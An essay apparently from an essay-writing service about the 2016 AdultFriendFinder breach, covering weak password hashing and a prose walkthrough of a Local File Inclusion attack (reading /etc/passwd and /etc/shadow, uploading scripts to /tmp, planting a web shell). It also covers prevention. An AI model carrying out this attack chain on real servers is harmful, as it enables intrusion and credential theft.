In in a total financial loss of around

In October 2016, Adult Dating site “AdultFriendFinder” became
victim of one of the largest personal data breaches ever recorded, with more
than 412 million accounts details being exposed. The details which had been
leaked included the customers emails, passwords, membership status, date of
visits, information of the browsers they were using and even their IP addresses
used for access. Adult friend finder also has ownership of other sites such as adult
sites, and which also suffered from the attack, losing
around 70 million account details between them. One of the more surprising
finds by the hackers was that they found almost 16 million “deleted” accounts
that were never actually purged from the company’s data. Along with these
accounts, there were files taken containing employee names, their home IP
addresses and even VPN keys used to access the company’s servers remotely.  Many of these hacked customer account details
were soon made available to purchase on criminal marketplaces.

This was not the first time Adult Friend Finder had been hacked.
Back in May 2015, the personal data of around 4 million users was left exposed
with details regarding not only their personal details, but their sexual
preferences along with other sensitive personal information. This attack was
performed by a hacker going by the name “RORRG” who’s motivation was to
collect revenge money which was owed to “his guy”. Along with this and a
further ransom demand, the attacks ended in a total financial loss of around
$350,000 (~£230.000) for Adult Friend Finder along with much public scrutiny
regarding their online security policies. Security experts have since been very
critical of the site’s lack of care for public security and not doing enough to
prevent another breach.

We Will Write a Custom Essay Specifically
For You For Only $13.90/page!

order now

After being victim of a successful attack and costly attack
in the past, it was surprising that the passwords which were stored in Adult
Friend Finder’s databases were either displayed in plain text format or were
hashed with SHA-1, which were cracked very quickly with minimal effort. This is
terrible practice for a company which is constantly dealing with so many
peoples sensitive data on a daily basis, especially considering they had been
hacked the previous year.  SHA-1 (Secure
Hash Algorithm 1) is a cryptic hash function which was first implemented in
1995 and has been known to be vulnerable attack for the last 10 years. Due to
its obvious flaws and there being a number of more reliable successor hash
algorithms introduced, The U.S. National Institute of Standards and Technology
banned the use of SHA-1 by U.S federal agencies in 2010 and digital certificate
authorities have not been allowed to issue SHA-1 signed certificates since
January 2016. This shows an extreme lack of care from AdultFriendFinder and
simple laziness on their security front.


Who is responsible?

Diana Ballou, the vice president of the Friend Finders
Networks received “a number of reports that there were security
vulnerabilities” and followed up to explain “While a number of these claims
proved to be false extortion attempts, we did identify and fix a vulnerability
that was related to the ability to access source code through an injection
vulnerability” (ZDnet, 2016). This information from Diana shows some obvious
flaws in the way the companies servers were being run. This was first brought
to light by a researcher who goes by the alias “1×0123” or “Revolver”. Not long
before the attack, Revolver posted screenshots taken on Adult Friend Finder,
displaying a Local File Inclusion Vulnerability being triggered. A Local File Inclusion
(LFI) would allow an attacker to use files which were stored somewhere else on
the server to be included the output of an application. This eventually allow
an attacker to remotely run malicious code on the web server. Revolver went
onto explain that the vulnerability was found in a module on the production
servers used by Adult Friend Finder.

A second notorious hacker going by the alias “Peace” also
admitted that he had breached Adult Friend Finder, and had already passed on
some of the information he had gathered, onto a further group of hackers. After
speaking out to Motherboard Vice “Peace said he had taken advantage of a
backdoor that was publicised on Hell (Hacking Forum) two years ago, and said he
used it last week to download a database of 73 million users” (Lorenzo
Fransceschi-Bicchierai, 2016). The fact that Peace was allowed to use an
exploit which was found and used over 2 years ago on a similar site, shows how
easy it was for someone to obtain the information needed to gain access to the company’s
servers and furthermore, just how out of touch Adult Friend Finders security
was to allow for a second attack like this. Peace followed up to agree with the
claims made by Revolver, that his attack was also via a Local File Inclusion.


How was it done?

The breach performed in October 2016 was a Local File
Inclusion (LFI) attack, something that was confirmed by two hackers who both
claimed to have infiltrated the site, and later confirmed by Adult Friend
Finder themselves. A LFI can be a common vulnerability in poorly written web
applications and can lead to granting a hacker access into a website and read
file from the system. Munin, a defensive security consultant explains “Such a
flaw can let hackers do “all kinds of things” including accessing any parts of
the server, running code on it, and even theoretically spying on users’
activities” (Munin, 2016). Having such a vulnerability as this, giving complete
access and surveillance to an attacker, can allow an attacker to essentially
take control of the web server. More importantly though, it can be very hard to
become aware of any breaches if the attacker is simply just monitoring activity
rather than acting maliciously upon the attack. This is even more serious on a
network such as Adult Friend Finder which are constantly inputting and
modifying people’s private details and credentials.


The basis of the attack is in which an attacker tricks the
web application into including files on the web server by exploiting
functionality that dynamically includes local files or scripts (Muscat, 2017). A
successful LFI attack like this can then lead to Remote Code Execution (RCE),
which can then lead to a Code Execution Attack; allowing an attacker to run
commands on that system. These commands are often used to elevate the attacker
privileges on the system, granting them free roam of the system and
furthermore, the internal network. Local File Inclusions were listed as the
second most recorded web application attack vector in Akamai’s “Q3 2016 State
of the Internet / Security Report” behind SQL injections (SQLi)(Curran, 2016).

The first thing an attacker must do when performing an
attack through an LFI vulnerability is to assess and identify any
vulnerabilities which they can exploit. LFI attacks primarily take advantage of
web applications written in the PHP programming language. Since PHP is used by
around 75% of all websites today, this attack has become very common at
targeting poorly written web applications. Any script found that includes a
file from a web server is a good candidate for further testing. For example
(see Figure 1)

1 ((Vulnerable PHP script, 2015)

 An attacker would
then attempt to exploit this by manipulating the files location parameter. Once
an LFI injection point has been found, the attacker would then use it to gather
as much data as they can about the system. This can be done very easily using a
list of commands to read certain files locations such /etc/passwd or
/etc/shadow etc. The following is an example of some attempted to exploit a
vulnerability by manipulating the file location parameter (see Figure 2). This
shows an attempt to display the contents of the /etc/passwd file on the system.

2 (Manipulating the File Location Parameter, 2015)

Shown below are the results of a successful exploitation on a web application
(see Figure 3)


 Once the attacker has
gained access and knowledge of the system, the attacker will then proceed to
upload a file upload script into the /tmp of the system and then using the file
upload, they can then add additional files to the system. By the attacker
managing to get their malicious code onto a web page, it is possible then to
convince a PHP script to then include a remote file instead to using a presumably
trusted file from the local file system. If successful in including “External”
files on the victim’s web page, they can then execute commands as they wish on
the victim’s web server.

Shown below (see Figure 4) is an example in PHP of a
vulnerability to LFI. The PHP script executes on the server side at runtime. It
shows how in a matter of exploiting two lines of code, the attacker can trick
the application into taking a file, and executing the file, allowing them to
upload as they wish to the web server. From this point attackers are likely to create
or upload a script such as a “Web Shell”. A web shell is a script which can be
uploaded to the web server allowing for remote administration of the machine.
This is can sometimes lead to the attacker gaining access to internal network
and gain access to other internal hosts. It is these web shells which allow
hackers to harvest sensitive data and credentials. This is likely to have been
something which would have happened the Adult Friend Finder case, allowing the
attackers to gain access to multiple web servers and databases from many
different sites.

4 (PHP Vulnerability to Local File Inclusion
(LFI), 2016)


Shown here (see Figure 5) is an example of file an attacker
may upload, which will be ran as the user running the web application, allowing
the attack to run any code as they wish.

5 (Example of Attacker file upload, 2016)


How to prevent LFI attacks?

There are many things that a company can and should do to
prevent being hit by a LFI attack and it all comes from eliminating any LFI
vulnerabilities. This starts by securing the PHP code of the website and not
allowing any opening for attackers. It is critical for companies who are
operating on these sites to use an application security testing software along
with using competent web coders to create and maintain the site to provide on-going
security. The security testing software is a solution which will scan and
identify any known code vulnerabilities along with addressing any industry
compliance regulations, something which was lacking in all area by Adult Friend
Finder. It is important to perform these tests often with updated software as
attackers are constantly finding new exploits in order to gain access.



The fact that the Adult Friend Finder network lost over 412
million accounts worth of details, just a year after being breached in a
similar manner, shows an inexcusable amount of care for the customers private
details and credentials. The company had made little to no improvements to
their security in regard to both their web servers, as well as the encryption
of the data which was stored on their databases. The company not only used
insufficient encryption which was outdated by many years, but even had some of
the employees and user’s information in plain text format. This attack has gone
down as one of the biggest data breaches to date and has set an example to
other large web base companies to the importance of their security policies and
infrastructure. Locating and taking advantage of an LFI vulnerability has
become so easy and available to everyone, since the software required can be
acquired online along with a numerous amount of in depth tutorials showing step
by step instructions of how to perform and carry out such an attack. This is
one of the reasons for this kind of attack quickly becoming one of the most
popular attacks carried out in todays online society. With so much information
being available to the public about how to carry out these attacks, it would be
assumed that companies would be investing as heavy in security and preventing
these attacks happening on themselves. 


I'm Mack!

Would you like to get a custom essay? How about receiving a customized one?

Check it out